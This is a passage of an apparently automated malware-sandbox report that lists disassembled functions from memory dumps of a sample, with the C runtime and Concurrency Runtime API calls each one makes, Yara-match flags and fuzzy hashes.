                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                    • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                                                    Function 024F5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378), ref: 024F51C8
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024F2213), ref: 024F51D4
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024F51E2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                    • Instruction ID: 46d4cad5752d5eb509e7f9e0e7faece8045562936209ace5683fc246282be1a1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B012036A022226BC7714F799C44E577B98AF86F617510731FA05D7241C720E541CAE4
                                                                                                                                                                                                                                                                    Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 78362717-0
                                                                                                                                                                                                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                    • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                                                                                                                                                                                    Function 024E6395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024E63AF
                                                                                                                                                                                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024E63C3
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024E63DB
                                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024E63F3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 78362717-0
                                                                                                                                                                                                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                    • Instruction ID: 81c69299a835aa918ba511e6bb5bddb62a1f90da02ee6139a2aa40fed0068101
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601F936600614B7EF16EE59C850AEF779E9F65761F01005BEC23EB381DAB0ED11CAA0
                                                                                                                                                                                                                                                                    Function 024E2B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
                                                                                                                                                                                                                                                                      • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
                                                                                                                                                                                                                                                                      • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
                                                                                                                                                                                                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
                                                                                                                                                                                                                                                                      • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                    • Instruction ID: 8de8eb5cdab98f28f590e1f8a502191193ae98d7daddfe58296bc3d5ac6bd466
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8118E76800204AFC715DF65C880ADBF7BAFF59320F014A5FE9568B591DBB0E904CBA0
                                                                                                                                                                                                                                                                    Function 024E2B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
                                                                                                                                                                                                                                                                      • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
                                                                                                                                                                                                                                                                      • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
                                                                                                                                                                                                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
                                                                                                                                                                                                                                                                      • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                    • Instruction ID: 59e08c815c588de5c0ee28ceb7b2c987c6e1d7029255c77ed5ff777828fc59c0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92011776400604ABCB24DF66C881EDAB7EAEF48320B108A1EE55A87650DBB0F9448B60
                                                                                                                                                                                                                                                                    Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 00405980
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                    • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                    • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                                                    Function 024C50CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 024C50D1
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 024C512B
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                    • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                    • Instruction ID: 36e30c5a337328801767f38a337664196c51b09789e3ddebe6308d06bff41201
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE018875D10309AFDB81EFA9C484B9DB7B1BF54315F60802FD059AB280CB789584CF95
                                                                                                                                                                                                                                                                    Function 024C5B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 024C5B8D
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C5BD8
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 024C5BE7
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C5BF7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                    • Instruction ID: 7f4e826561725ce430ae2d31f30f72ea0b42f73d67a3772ca3868240406ece1f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE014875910209AFDB80EFA9D484B9DB7B1BF54315F60802FD059AB280DBB89984CF95
                                                                                                                                                                                                                                                                    Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                    • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                                                    Function 024DC13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC170
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC180
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC190
                                                                                                                                                                                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024DC1A4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                    • Instruction ID: fd19ad043427d46b40b90821db1211e7958cda1eb0dfa16cd4f396e399c813a9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A01193A004129BBDF139E94DC918AE7B66AF25350F048517F928C4170D732D6B2EF81
                                                                                                                                                                                                                                                                    Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                                                      • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                                                      • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                    • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                                                    Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                                                                                                                                                                                      • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                                                                                                                                                                                      • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00413541
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                                                                                                                                                                                      • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                    • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                                                                                                                                                                                    Function 024D3773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024D378C
                                                                                                                                                                                                                                                                      • Part of subcall function 024D2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024D2B2C
                                                                                                                                                                                                                                                                      • Part of subcall function 024D2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024D2B4B
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 024D37A8
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D37BE
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D37CC
                                                                                                                                                                                                                                                                      • Part of subcall function 024D28EC: SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                    • Instruction ID: d2598334a69d68ba9462d9f3fe4cf601aa05e88b38dbfd594def069115570f7a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F027B2A002153AE720FB724C06FBB3A9C9F00741F50086BFC05E3181EAD9D4048AB5
                                                                                                                                                                                                                                                                    Function 024CD486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024D1342
                                                                                                                                                                                                                                                                      • Part of subcall function 024D0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024D0BD6
                                                                                                                                                                                                                                                                      • Part of subcall function 024D0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024D0BF7
                                                                                                                                                                                                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024D1355
                                                                                                                                                                                                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024D1361
                                                                                                                                                                                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024D136A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
